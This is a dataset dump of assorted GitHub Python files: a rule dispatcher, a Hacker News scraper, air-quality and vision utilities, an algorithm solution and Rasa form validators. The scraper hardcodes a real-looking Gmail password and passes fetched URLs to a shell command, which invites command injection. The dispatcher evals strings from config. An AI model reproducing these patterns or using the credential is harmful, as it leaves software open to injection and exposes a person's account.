blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cec549844f429ed57e856702a1979e9d7ed82176 | 4574f5c8e491993dbb89b8a0abc63ede4b9adfc0 | /src/rule_chains/dispatch.py | dd4fe6c45e938b70d29325a739976965815a027b | [
"Apache-2.0"
] | permissive | deeso/rule-chains | 93f472e79b2e2eb9a17618a11940b7fe9afb00bb | 499e42626a4c1911be7916aabfcb76a7172a55cd | refs/heads/master | 2021-01-21T08:11:53.675403 | 2018-03-13T05:37:23 | 2018-03-13T05:37:23 | 101,954,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,097 | py | class ChainDispatchResult(object):
def __init__(self, table_name, chain_name=None, success=False,
chain_result=None,
block_results=None, chain_results=None, rvalue=None,
extraction_rule_results=None, outcome=False,
extraction_value=None, block_name=None):
self.table_name = table_name
self.extraction_rule_results = extraction_rule_results
self.extraction_value = extraction_value
self.chain_name = chain_name
self.chain_outcome = outcome
self.chain_rvalue = rvalue
self.block_name = block_name
self.block_results = block_results
self.chain_result = chain_result
self.outcome = outcome
def get_chain_results(self):
return self.chain_result
def get_rule_results(self):
if self.chain_result is not None:
return self.chain_result.get_rule_results()
return None
def get_rule_name(self):
if self.chain_result is not None:
return self.chain_result.get_rule_name()
return None
def update_from_chain_result(self, chain_result):
self.chain_name = chain_result.chain_name
self.chain_result = chain_result
self.chain_outcome = chain_result.outcome
self.block_name = chain_result.block_name
self.block_results = chain_result.block_results
self.chain_rvalue = chain_result.rvalue
self.outcome = chain_result.outcome
class ChainDispatch(object):
def __init__(self, name, extract_rule, extract_type, extract_value,
all_blocks=[], any_blocks=[], none_blocks=[], blocks=[],
dispatch_table={}, perform_blocks=None):
self.name = name
self.extract_rule = extract_rule
self.dispatch_table = dispatch_table
self.raw_value = extract_value
self.perform_blocks = perform_blocks
self.blocks = blocks
self.all_blocks = all_blocks
self.any_blocks = any_blocks
self.none_blocks = none_blocks
self.extract_value = self.code_factory(extract_type, extract_value)
@classmethod
def code_factory(cls, ctype, cvalue):
if ctype == 'lambda':
return eval(cvalue)
elif ctype == 'function':
return eval(cvalue)
return lambda state, res: None
@classmethod
def from_json(cls, json_data, block_objs={}, chains={}, chains_def={}):
name = json_data.get('name', None)
extract_rule = json_data.get('extract_rule', None)
etype = json_data.get('extract_type', None)
evalue = json_data.get('extract_value', None)
any_blocks = json_data.get('any', [])
all_blocks = json_data.get('all', [])
none_blocks = json_data.get('none', [])
_blocks = any_blocks + all_blocks + none_blocks
blocks = dict((c, block_objs.get(c)) for c in _blocks
if c in block_objs)
perform_blocks = json_data.get('perform_blocks', [])
# print name, extract_rule, etype, evalue
if name is None or \
extract_rule is None or \
etype is None or \
evalue is None:
raise Exception("Missing required Block parameters")
dispatch_table = {}
# print json_data.get('dispatch_table')
for k, v in json_data.get('dispatch_table', []):
c = chains.get(v, None)
dispatch_table[k] = c
return ChainDispatch(name, extract_rule, etype, evalue,
all_blocks=all_blocks, any_blocks=any_blocks,
none_blocks=none_blocks, blocks=blocks,
dispatch_table=dispatch_table,
perform_blocks=perform_blocks)
def execute_value_extraction(self, string, frontend=None, state={}):
frontend = frontend if frontend is not None else self.frontend
results = frontend.match_pattern(self.extract_rule, string)
value = self.extract_value(state, results.get('rule_results', {}))
# print "value is: ", value
return value, results
def execute_dispatch(self, string, frontend=None, state={}):
cdr = ChainDispatchResult(self.name)
frontend = frontend if frontend is not None else self.frontend
if frontend is None:
raise Exception("Missing frontend reference")
# TODO run a pre-check set of blocks or chains
# before executing the value extraction
value, rule_results = self.execute_value_extraction(string,
frontend, state)
# print value, rule_results
cdr.extraction_value = value
cdr.extraction_rule_results = rule_results
chains = self.dispatch_table.get(value, None)
if chains is not None:
chain_result = chains.execute_chains(string)
cdr.update_from_chain_result(chain_result)
return cdr
def update_frontend(self, frontend):
self.frontend = frontend
| [
"adam.pridgen@thecoverofnight.com"
] | adam.pridgen@thecoverofnight.com |
57a6ff8fd720a80cb15839c2e0932f27d9b3a853 | 676b5bf3737477597b97b1efdf955bdf38e9e7c6 | /production.py | 6e22ff73bb07ba4b791e2ccba6883dc51933f918 | [] | no_license | blandry/ike | fbf31aaf58604353a8804df920eb4bf616e40185 | e4f7954d35b6f325b5a8056e875d01428924b08e | refs/heads/master | 2016-09-06T07:24:46.296660 | 2013-02-04T20:14:35 | 2013-02-04T20:14:35 | 8,014,505 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | # SERVER
DEBUG = False
SECRET_KEY = ""
HOST_ADDRESS = ""
DATABASE = ""
SMTP_SETTINGS = {
"MAIL_SERVER": "",
"MAIL_PORT": 465,
"MAIL_USE_SSL": True,
"MAIL_USERNAME": "",
"MAIL_PASSWORD": "",
"DEFAULT_MAIL_SENDER": ("Ike", "")
}
| [
"landry@mit.edu"
] | landry@mit.edu |
2d24bf026f2a9076fab6ab81a9eb523d592a70ac | 6d3b954188c670864d302bf5846ab71225bfd24b | /Lab 2.py | ebe1ad14b3bf42a7a849f4529e1fb01279106fdf | [] | no_license | johnperd/Coding-Projects | 8d18c16bca928b0fcca3da3760084342d98da32d | 6458fd09a6bec82e7b0735f0e6c214a4ed6b7dd7 | refs/heads/master | 2022-10-31T06:24:25.059420 | 2020-06-15T15:48:29 | 2020-06-15T15:48:29 | 272,480,197 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | #!/usr/bin/env python
# coding: utf-8
# Type Markdown and LaTex: $a^2$
# In[1]:
from resources306 import*
# In[2]:
def f(x,y):
return x**2 - x**2 *y
y = 3
x = 0
xfinal = 5
n = 20
h = (xfinal - x) / n
xlist = [x]
ylist = [y]
for i in range(n):
slope = f(x,y)
y = y + h*slope
x = x + h
xlist.append(x)
ylist.append(y)
# In[3]:
plt.figure(figsize=(8,8))
slopefieldplot(f,0,4,0,4,.1,lw=2)
plt.plot(xlist, ylist, 'mo-', lw=3, alpha=.6, label = 'Euler Approximation')
plt.xlabel('x')
plt.ylabel('y')
plt.legend(loc='center')
# In[4]:
def f(x,y):
return x - y + 2
y = 5
x = 0
xfinal = 8
n = 16
h = (xfinal - x) / n
xlist = [x]
ylist = [y]
for i in range(n):
slope = f(x,y)
y = y + h*slope
x = x + h
xlist.append(x)
ylist.append(y)
# In[5]:
plt.figure(figsize=(8,8))
slopefieldplot(f,0,4,2,7,.1,lw=2)
plt.plot(xlist, ylist, 'mo-', lw=3, alpha=.6, label = 'Euler Approximation')
plt.xlabel('x')
plt.ylabel('y')
plt.legend(loc='center')
# In[ ]:
| [
"noreply@github.com"
] | noreply@github.com |
f582bd1fe8a38bfb9010d139d33a72d4f79d7469 | 401aae63dde689f298c196b9063b6dca3ecf529b | /utils.py | 4f3987e6e9f34679e576b4a3765a5a7ebe79e7e9 | [] | no_license | dunovank/Hierarchical-Attention-Network-1 | 1791c4afddaf786abd60e05bf3eb4b542c9a1306 | 558660c7030e41698b62702c88741f0a893c8509 | refs/heads/master | 2021-10-25T09:17:28.882012 | 2019-04-03T11:50:51 | 2019-04-03T11:50:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,591 | py | import matplotlib.pyplot as plt
import numpy as np
from matplotlib.lines import Line2D
def plot_grad_flow(named_parameters):
'''Plots the gradients flowing through different layers in the net during training.
Can be used for checking for possible gradient vanishing / exploding problems.
Usage: Plug this function in Trainer class after loss.backwards() as
"plot_grad_flow(self.model.named_parameters())" to visualize the gradient flow'''
ave_grads = []
max_grads = []
layers = []
for n, p in named_parameters:
if (p.requires_grad) and ("bias" not in n):
layers.append(n)
try:
ave_grads.append(p.grad.abs().mean())
max_grads.append(p.grad.abs().max())
except Exception as err:
print("Encountered Exception at {}".format(n))
plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color="c")
plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color="b")
plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color="k")
plt.xticks(range(0, len(ave_grads), 1), layers, rotation="vertical")
plt.xlim(left=0, right=len(ave_grads))
plt.ylim(bottom=-0.001, top=0.5) # zoom in on the lower gradient regions
plt.xlabel("Layers")
plt.ylabel("average gradient")
plt.title("Gradient flow")
plt.grid(True)
plt.legend([Line2D([0], [0], color="c", lw=4),
Line2D([0], [0], color="b", lw=4),
Line2D([0], [0], color="k", lw=4)], ['max-gradient', 'mean-gradient', 'zero-gradient'])
plt.show() | [
"shikhar.chauhan@live.com"
] | shikhar.chauhan@live.com |
5d2082d3e3def9f57df6a426a6737196aaf6343c | 52f29bc09f0a18e875f05281d72f1ca1384f2ff1 | /src/main.py | 2a63e2e1710f08c18051b0deabdcee66169707f2 | [] | no_license | S-Tabayashi/predict-_stock_prices | c1dca789bd4a5e9ee7a0ec0b19406e891f1ccdc6 | b62ab1fd73158044ea36d6db2fcc70e88877c335 | refs/heads/master | 2023-03-28T18:02:51.680427 | 2021-03-24T00:25:59 | 2021-03-24T00:25:59 | 350,893,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | from predictor import ScoringService as cls
# データセットをダウンロードして解凍したファイルを配置した場所を定義します。
# データ保存先ディレクトリ
DATASET_DIR= "../../data_dir"
# 読み込むファイルを定義します。
inputs = cls.get_inputs(DATASET_DIR)
print(inputs)
cls.train_and_save_model(inputs, model_path="model") | [
"stmode2003@gmail.com"
] | stmode2003@gmail.com |
bd917135a719065989f4c65a11886c065ce87756 | 41bf060da18b573e3b9184ce6e263266618864f3 | /app/blueprints/search/__init__.py | 3c3ea08250d01ebba123dc4627fbcd3c15969e75 | [] | no_license | vioan/pinboard-archiver | ebf4710c8f630dc8aa97ac58d37ea1d780c7e83d | 99d0d38bc9710443c226fe3c7c2aed0c88cf97c0 | refs/heads/master | 2020-05-26T07:11:42.917259 | 2012-11-28T08:20:52 | 2012-11-28T08:20:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | from flask import Blueprint
blueprint = Blueprint('search', __name__, template_folder='templates')
| [
"edward.stone@tobias.tv"
] | edward.stone@tobias.tv |
879c72a749aa447e3cf0d98e4a0ad65d7b96ec4b | 97ad602612adf894bdfab85c4867cac69b2d7c99 | /learnpythonthehardway/erect-fence.py | c6590a9ee3c6e8e39d645b035aeca2371444cfce | [] | no_license | cotncndy/leetcode-python | bebd15f3dd44e8ed1c5f33f29314977de4fcc141 | 591067d87209702c4d41e1a9fce88f9dd1815fed | refs/heads/master | 2020-03-17T03:05:07.182353 | 2018-05-10T16:37:57 | 2018-05-10T16:37:57 | 133,219,257 | 0 | 3 | null | 2018-05-13T08:34:43 | 2018-05-13T08:34:43 | null | UTF-8 | Python | false | false | 2,630 | py | # There are some trees, where each tree is represented by (x,y) coordinate in a two-dimensional garden. Your job is
# to fence the entire garden using the minimum length of rope as it is expensive. The garden is well fenced only if
# all the trees are enclosed. Your task is to help find the coordinates of trees which are exactly located on the
# fence perimeter.
#
# Example 1:
# Input: [[1,1],[2,2],[2,0],[2,4],[3,3],[4,2]]
# Output: [[1,1],[2,0],[4,2],[3,3],[2,4]]
# Explanation:
#
# Example 2:
# Input: [[1,2],[2,2],[4,2]]
# Output: [[1,2],[2,2],[4,2]]
# Explanation:
#
# Even you only have trees in a line, you need to use rope to enclose them.
# Note:
#
# All trees should be enclosed together. You cannot cut the rope to enclose trees that will separate them in more
# than one group.
# All input integers will range from 0 to 100.
# The garden has at least one tree.
# All coordinates are distinct.
# Input points have NO order. No order required for output.
# Definition for a point.
class Point(object):
def __init__(self, a=0, b=0):
self.x = a
self.y = b
class Solution(object):
def outerTrees(self, points):
"""
:type points: List[Point]
:rtype: List[Point]
"""
res, collinear, start = set(), set(), points[0]
for p in points: # find the left most point
if p.x < start.x:
start = p
res.add(start)
cur = start
while True:
next = points[0]
for p in points:
if p == cur:
continue
cross = self.dotProduct(cur, next, p)
if cross > 0:
next, collinear = p, set()
elif cross == 0:
if self.dist(cur, next) < self.dist(cur, p):
collinear.add(next)
next = p
else:
collinear.add(p) # bugfixed
for p in collinear:
res.add(p)
if next == start:
break
res.add(next)
cur = next
return list(res)
def dotProduct(self, a, b, c):
baX, baY = a.x - b.x, a.y - b.y
bcX, bcY = c.x - b.x, c.y - b.y
return baX * bcY - baY * bcX
def dist(self, a, b):
return (a.x - b.x) ** 2 + (a.y - b.y) ** 2
def wrapper(self, a):
li = []
for p in a:
li.append(Point(p[0], p[1]))
return self.outerTrees(li)
if __name__ == '__main__':
s = Solution().wrapper([[1, 1], [2, 2], [2, 0], [2, 4], [3, 3], [4, 2]])
| [
"xin_wei@intuit.com"
] | xin_wei@intuit.com |
1ee20e93ca836125eae3cb9415d3f3ac36ae0383 | 2f08b7b60fa308488897fcc2d324f92e0ef4cbda | /wiseassenterprises.com/html/weather/we3.py | 2bd17b5eb895d1f034a1f24e766c0cc36d910b43 | [] | no_license | ravirajpophale/www | 1f5db1bab7282217850130c0f5c4260f09c1cbec | bb777a20abf22b1613b77995b6e3f09da61a59b1 | refs/heads/master | 2023-06-12T00:46:34.271860 | 2021-07-05T15:52:39 | 2021-07-05T15:52:39 | 383,192,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,418 | py | import urllib, json
import os
import time, datetime
__author__ = 'Mayur Kulkarni <mayurkulkarni012@gmail.com>'
def get_json(loc):
#url = 'http://api.waqi.info/feed/geo:18.536428;73.805453/?token=9d43420bc698329eedd8eb12f0bf98e66426ca98'#pashan
url = "http://api.waqi.info/feed/geo:" + str(loc["lat"]) + ";" + str(loc["lon"]) + "/?token=9d43420bc698329eedd8eb12f0bf98e66426ca98"
response = urllib.urlopen(url)
data = json.loads(response.read())
return data
def append_headers(file_handle):
file_handle.write('timestamp, aqi, co, h, no2, o3, pm10, pm25, t')
file_handle.write('\n')
def current_timestamp():
return datetime.datetime.fromtimestamp(time.time()) \
.strftime('%Y-%m-%d %H:%M:%S')
station_info = {
"bhosari": {
"lat": 18.642103,
"lon": 73.849083,
},
"shivajinagar": {
"lat": 18.529603,
"lon": 73.849586,
},
"hadapsar": {
"lat": 18.502167,
"lon": 73.927456,
},
"katraj": {
"lat": 18.459869,
"lon": 73.852306,
},
"manjri": {
"lat": 18.526778,
"lon": 73.975028,
},
"pashan": {
"lat": 18.536428,
"lon": 73.805453,
},
"nigdi": {
"lat":18.6571,
"lon":73.7659,
},
"bhumkar-chowk": {
"lat": 18.606219,
"lon": 73.750022,
},
"Alandi": {
"lat": 18.673708,
"lon": 73.891506,
},
}
def write_data():
file_name = 'weather_data_'
for station in station_info:
f = None
if os.path.exists(os.getcwd() + '\\' + file_name + station + '.csv'):
# don't append headers
print 'file ' + file_name + station + '.csv' + ' already present, resuming writing'
f = open(file_name + station + '.csv', 'a+')
else:
# append headers
print 'file not present, creating file: ' + file_name + station + '.csv'
f = open(file_name + station + '.csv', 'a+')
append_headers(f)
json_response = get_json(station_info[station])
if json_response['status'] == 'ok':
print 'HTTP response OK. Collecting data for ' + station + ' at time ' + current_timestamp()
row_string = '{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}\n'.format(current_timestamp(), json_response['data']['aqi'],
json_response['data']['iaqi']['co']['v'] if 'co' in json_response['data']['iaqi'] else 'NA',
json_response['data']['iaqi']['h']['v'] if 'h' in json_response['data']['iaqi'] else 'NA',
json_response['data']['iaqi']['no2']['v'] if 'no2' in json_response['data']['iaqi'] else 'NA',
json_response['data']['iaqi']['o3']['v'] if 'o3' in json_response['data']['iaqi'] else 'NA',
json_response['data']['iaqi']['pm10']['v'] if 'pm10' in json_response['data']['iaqi'] else 'NA',
json_response['data']['iaqi']['pm25']['v'] if 'pm25' in json_response['data']['iaqi'] else 'NA',
json_response['data']['iaqi']['t']['v']) if 't' in json_response['data']['iaqi'] else 'NA'
f.write(row_string)
else:
with open('weather_data_log.txt', 'a+') as error:
error.write(json_response)
error.close()
f.close()
def nl():
print '*' * 75
if __name__ == '__main__':
nl()
print 'Running script to collect data from: http://api.waqi.info/feed/geo:18.526778;73.975028'
nl()
time.sleep(3)
while (True):
write_data()
nl()
print 'Iteration completed, sleeping for 1 hour'
nl()
time.sleep(3600)
| [
"raviraj.pophale@gmail.com"
] | raviraj.pophale@gmail.com |
b69b52e5f9ea49a0fb6647fb95417e9d880c1ac1 | 5acc77c4d594c1750a9b7477499ee25b4c307bca | /ehpi_action_recognition/networks/action_recognition_nets/action_rec_net_ehpi.py | b0f025abbc592698624fe9a900a4b478838ee111 | [
"MIT"
] | permissive | noboevbo/ehpi_action_recognition | bc15a3c260c79b85a82844a2779c9b1ec9cf42fd | 3b77eeb5103f0f11c8d4be993ec79dddad7e661c | refs/heads/master | 2021-12-29T05:24:31.891044 | 2021-12-19T16:23:36 | 2021-12-19T16:23:36 | 180,351,212 | 113 | 23 | null | 2019-04-23T11:24:27 | 2019-04-09T11:22:45 | Python | UTF-8 | Python | false | false | 3,202 | py | from typing import List, Dict
import cv2
import numpy as np
import torch
from nobos_commons.data_structures.dimension import ImageSize
from nobos_commons.data_structures.human import Human
from nobos_commons.data_structures.humans_metadata.algorithm_output_buffer import AlgorithmOutputBuffer
from nobos_commons.data_structures.humans_metadata.algorithm_output_buffer_entry import AlgorithmOutputBufferEntry
from nobos_commons.feature_preparations.feature_vec_producers.from_skeleton_joints.feature_vec_producer_ehpi import \
FeatureVecProducerEhpi
from nobos_torch_lib.datasets.action_recognition_datasets.ehpi_dataset import RemoveJointsOutsideImgEhpi, NormalizeEhpi
from torch.autograd import Variable
class ActionRecNetEhpi(object):
def __init__(self, model, feature_vec_producer: FeatureVecProducerEhpi, image_size: ImageSize):
self.model = model
self.feature_vec_producer = feature_vec_producer
self.action_buffer: AlgorithmOutputBuffer = AlgorithmOutputBuffer(buffer_size=32)
self.remove = RemoveJointsOutsideImgEhpi(image_size)
self.normalize = NormalizeEhpi(image_size)
model.cuda()
model.eval()
def get_actions(self, humans: List[Human], frame_nr: int) -> Dict[str, np.ndarray]:
ehpi_vecs = []
for human in humans:
ehpi_vecs.append(
AlgorithmOutputBufferEntry(human.uid, self.feature_vec_producer.get_feature_vec(human.skeleton)))
self.action_buffer.add(ehpi_vecs, frame_nr)
humans_for_action_rec = self.action_buffer.get_all(only_full_buffer=True)
outputs: Dict[str, np.ndarray] = {}
for human_id, action_vecs in humans_for_action_rec.items():
ehpi_img = np.zeros((32, 15, 3), dtype=np.float32)
for frame_num, action_vec in enumerate(action_vecs):
if action_vec is None:
continue
ehpi_img[frame_num] = action_vec
ehpi_img = np.transpose(ehpi_img, (2, 0, 1))
# Set Blue Channel to zero
ehpi_img[2, :, :] = 0
# Normalize EHPI
tmp_dict = {'x': ehpi_img}
tmp_dict['x'] = self.remove(tmp_dict)['x']
ehpi_img = self.normalize(tmp_dict)['x']
# action_img = np.transpose(np.copy(ehpi_img), (2, 1, 0))
# action_img *= 255
# action_img = action_img.astype(np.uint8)
# # action_img = cv2.resize(action_img, (action_img.shape[1] * 30, action_img.shape[0] * 30), cv2.INTER_NEAREST)
# action_img = cv2.cvtColor(action_img, cv2.COLOR_BGR2RGB)
# cv2.imshow("ehpi", action_img)
# cv2.waitKey(1)
# cv2.imwrite(os.path.join(get_create_path("/media/disks/beta/dump/itsc_2019_imgs/ehpi"),
# "{}.png".format(str(frame_nr).zfill(5))), action_img)
net_input = np.zeros((1, 3, 32, 15), dtype=np.float32)
net_input[0] = ehpi_img
input_seq = Variable(torch.tensor(net_input, dtype=torch.float)).cuda()
tag_scores = self.model(input_seq).data.cpu().numpy()[0]
outputs[human_id] = tag_scores
return outputs
| [
"Dennis.Ludl@reutlingen-university.de"
] | Dennis.Ludl@reutlingen-university.de |
d9125665480f9fb273f6e7705380e50c2a1ebaca | 91f38b3f1d4509d55ad80e9ba9f56a2b78beeee4 | /get_data.py | a7d796b2eafbfd1c9f3ecbf255603732e46e8385 | [] | no_license | tyc/weekendprj | 3995e607c2269a9bb7481a5d0158032b7e344bd1 | 6d71c6fe2bbb020b6ca22bcf8df80fda27acd240 | refs/heads/master | 2016-09-10T19:51:08.938223 | 2012-07-09T21:02:24 | 2012-07-09T21:02:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,172 | py | #!/usr/bin/python
import urllib2
import simplejson as json
import smtplib
import datetime
from optparse import OptionParser
import subprocess
def test(abc):
SMTP_SERVER = 'smtp.gmail.com'
SMTP_PORT = 587
sender = 'tehn.yit.chin@gmail.com'
recipient = 'tehn.yit.chin@gmail.com'
subject = 'Gmail SMTP Test'
body = 'blah blah blah'
"Sends an e-mail to the specified recipient."
body = "" + body + abc + ""
headers = ["From: " + sender,
"Subject: " + subject,
"To: " + recipient,
"MIME-Version: 1.0",
"Content-Type: text/html"]
headers = "\r\n".join(headers)
session = smtplib.SMTP(SMTP_SERVER, SMTP_PORT)
session.ehlo()
session.starttls()
session.ehlo
session.login(sender, 'chillout123')
session.sendmail(sender, recipient, headers + "\r\n\r\n" + body)
session.quit()
return None
parser = OptionParser()
parser.add_option("-l", "--limits", dest="limits", help="max number of queries to get")
(options, args)=parser.parse_args()
if options.limits != None:
limit = int(options.limits)
else:
limit = 30
print "Getting " + str(limit) + " number of articles"
search_base_url = 'http://api.thriftdb.com/api.hnsearch.com/items/_search?limit='
start = 0
sort_by = 'create_ts+desc'
base_url_orig = "http://api.thriftdb.com/api.hnsearch.com/items/_search?limit=30&sortby=create_ts+desc&q=%22Show+HN%22&weights[title]=1.1&weights[text]=0.7&weights[domain]=2.0&weights[username]=0.1&weights[type]=0.0&boosts[fields][points]=0.15&boosts[fields][num_comments]=0.15&boosts[functions][pow(2,div(div(ms(create_ts,NOW),3600000),72))]=200.0&pretty_print=true"
prefix_url = "http://api.thriftdb.com/api.hnsearch.com/items/_search?limit="
post_url = "&sortby=create_ts+desc&q=%22Show+HN%22&weights[title]=1.1&weights[text]=0.7&weights[domain]=2.0&weights[username]=0.1&weights[type]=0.0&boosts[fields][points]=0.15&boosts[fields][num_comments]=0.15&boosts[functions][pow(2,div(div(ms(create_ts,NOW),3600000),72))]=200.0&pretty_print=true"
base_url = prefix_url + repr(limit)
base_url = base_url + "&start=" + repr(start) + post_url
req = urllib2.Request(base_url)
opener = urllib2.build_opener()
f = opener.open(req)
json_obj = json.load(f)
# get the filename
filename = datetime.datetime.now().strftime("%Y%m%d")
filename = str(filename) + "_from_hnsearch.csv"
output_file = open(filename, "w")
# print out each line that is not in the file
output_file.write("create_ts,title,url,id,hn_discussion\n")
for title in json_obj["results"]:
string = title["item"]["create_ts"]
string = string + ","
if title["item"]["title"] != "":
string = string + "\""
string += repr(title["item"]["title"] )
string = string + "\""
else:
string += repr("")
string = string + ","
if title["item"]["url"] != "":
string = string + "\""
string += repr(title["item"]["url"] )
url_string = str(title["item"]["url"])
string = string + "\""
else:
string += repr("")
string = string + ","
string += repr(title["item"]["id"])
string += ","
string = string + "\""
string += "http://news.ycombinator.com/item?id="
string += repr(title["item"]["id"])
string = string + "\""
output_file.write(string+"\n")
if url_string != "":
itemid_string=repr(title["item"]["id"])
params = ["./get_shot.py", "--url="+url_string]
exitcode = subprocess.call("./get_shot.py --id="+itemid_string+" --url="+url_string, shell=True)
output_file.close()
#title_abc = "fatdog"
#url = "google.com"
#url_text = "google.com"
#id_abc=repr(123)
#html_message = "<p><font face='Arial, Helvetica, sans-serif'><b>Project :</b>" + title_abc + "</font></p>";
#html_message += "<p><font face='Arial, Helvetica, sans-serif'><b>Where:</b> </font>" ;
#html_message += "<a href=" + url + " style='color: #1155cc;' target=''><font face='Arial, Helvetica, sans-serif'>" + url_text + "</font></a></p>";
#html_message += "<p><font face='Arial, Helvetica, sans-serif'><b>Tagline :</b>" + title_abc + "</font></p>";
#html_message += "<p><p><a href=http://news.ycombinator.com/item?id=" + id_abc + " style='color: #1155cc;' target='_blank'><font face='Arial, Helvetica, sans-serif'>HN Discussions</font></a></p>";
#test(html_message)
| [
"tehn.yit.chin@gmail.com"
] | tehn.yit.chin@gmail.com |
3f46fed101cfe16182efd1f60760d48f44357b84 | 38272cdcd91966bdff868c13b16f0e59a4518972 | /back_python/habitinfo/__init__.py | 7da88d0fb4f278b09bb6b42b79c61b2067ee00b6 | [] | no_license | read-group/habit | 0a84b9c422e7034aaa3f5cc356a84e5b4f90827c | 837164408286fbfe036f245badd153ea29a41f7f | refs/heads/master | 2021-01-11T22:38:37.946129 | 2017-08-26T15:16:20 | 2017-08-26T15:16:20 | 79,004,864 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 52 | py | default_app_config="habitinfo.apps.HabitinfoConfig"
| [
"jiangyong@qq.com"
] | jiangyong@qq.com |
589cb44e6bd250ca99485e8a12bf3737b5cdbe43 | 0d0cf0165ca108e8d94056c2bae5ad07fe9f9377 | /24_Image_Processing_with_Keras_in_Python/2_Using_Convolutions/trainingACNNToClassifyClothingTypes.py | a19cd93f8c468f435f23c4ea61341e3ec4a0d1ca | [] | no_license | MACHEIKH/Datacamp_Machine_Learning_For_Everyone | 550ec4038ebdb69993e16fe22d5136f00101b692 | 9fe8947f490da221430e6dccce6e2165a42470f3 | refs/heads/main | 2023-01-22T06:26:15.996504 | 2020-11-24T11:21:53 | 2020-11-24T11:21:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,121 | py | # Training a CNN to classify clothing types
# Before training a neural network it needs to be compiled with the right cost function, using the right optimizer. During compilation, you can also define metrics that the network calculates and reports in every epoch. Model fitting requires a training data set, together with the training labels to the network.
# The Conv2D model you built in the previous exercise is available in your workspace.
# Instructions
# 100 XP
# Compile the network using the 'adam' optimizer and the 'categorical_crossentropy' cost function. In the metrics list define that the network to report 'accuracy'.
# Fit the network on train_data and train_labels. Train for 3 epochs with a batch size of 10 images. In training, set aside 20% of the data as a validation set, using the validation_split keyword argument.
# Compile the model
model.compile(optimizer='adam',
loss='categorical_crossentropy',
metrics=['accuracy'])
# Fit the model on a training set
model.fit(train_data, train_labels,
validation_split=0.2,
epochs=3, batch_size=10)
| [
"noreply@github.com"
] | noreply@github.com |
cc8d30b530404a6ca46a394b3ec1e689d59b0ef7 | 00db7c7d56619fdf36a86941dda7ee5cac3d61e5 | /rasa/04_forms_test/actions/forms_test_actions.py | 170a9464e3fda21fd509918aa3caa1f907470049 | [] | no_license | persocom01/TestAnaconda | d8926dd239159ddb60a29a28700034260075e0f6 | a8b435f9d82b69752e1782c3089b20c5d9dcf3e2 | refs/heads/master | 2023-07-11T00:44:23.097919 | 2023-06-26T07:21:38 | 2023-06-26T07:21:38 | 213,216,064 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,109 | py | from typing import Any, Text, Dict, List
from rasa_sdk import Action, Tracker, FormValidationAction
from rasa_sdk.executor import CollectingDispatcher
import re
class ValidateAdventurerForm(FormValidationAction):
def name(self) -> Text:
return "validate_adventurer_form"
@staticmethod
def class_list() -> List[Text]:
return ['fighter', 'knight', 'crusader', 'priest', 'archpriest']
def validate_name(
self,
slot_value: Text,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> Dict[Text, Any]:
print('validating name')
pattern = r'^[a-zA-Z][a-zA-z\s]*'
is_valid = re.search(pattern, slot_value)
print(is_valid)
if is_valid:
print('pass')
dispatcher.utter_message(text='noted')
return {'name': slot_value}
else:
print('fail')
dispatcher.utter_message(text='names may only contain letters and spaces')
return {'name': None}
def validate_age(
self,
slot_value: Text,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> Dict[Text, Any]:
print('validating age')
pattern = r'^[0-9]+$'
is_valid = re.search(pattern, slot_value)
if is_valid:
is_minor = float(is_valid.group()) < 16
if is_minor:
dispatcher.utter_message(text='noted')
return {'age': slot_value, 'minor': True}
else:
dispatcher.utter_message(text='noted')
return {'age': slot_value, 'minor': False}
else:
dispatcher.utter_message(text='age can only be a number')
return {'age': None}
def validate_class(
self,
slot_value: Text,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> Dict[Text, Any]:
print('validating class')
if slot_value.lower() in self.class_list():
dispatcher.utter_message(text='noted')
return {'class': slot_value}
else:
dispatcher.utter_message(text='choose a valid class')
return {'class': None}
def validate_experience(
self,
slot_value: Text,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> Dict[Text, Any]:
print('validating experience')
age = float(tracker.get_slot('age'))
pattern = r'^[0-9]+$'
is_valid_experience = re.search(pattern, slot_value)
if is_valid_experience:
experience = float(is_valid_experience.group())
is_smaller_than_age = experience < age
if is_valid_experience and is_smaller_than_age:
dispatcher.utter_message(text='noted')
return {'experience': slot_value}
else:
dispatcher.utter_message(text='experience must be lower than age')
return {'experience': None}
| [
"persocom02@gmail.com"
] | persocom02@gmail.com |
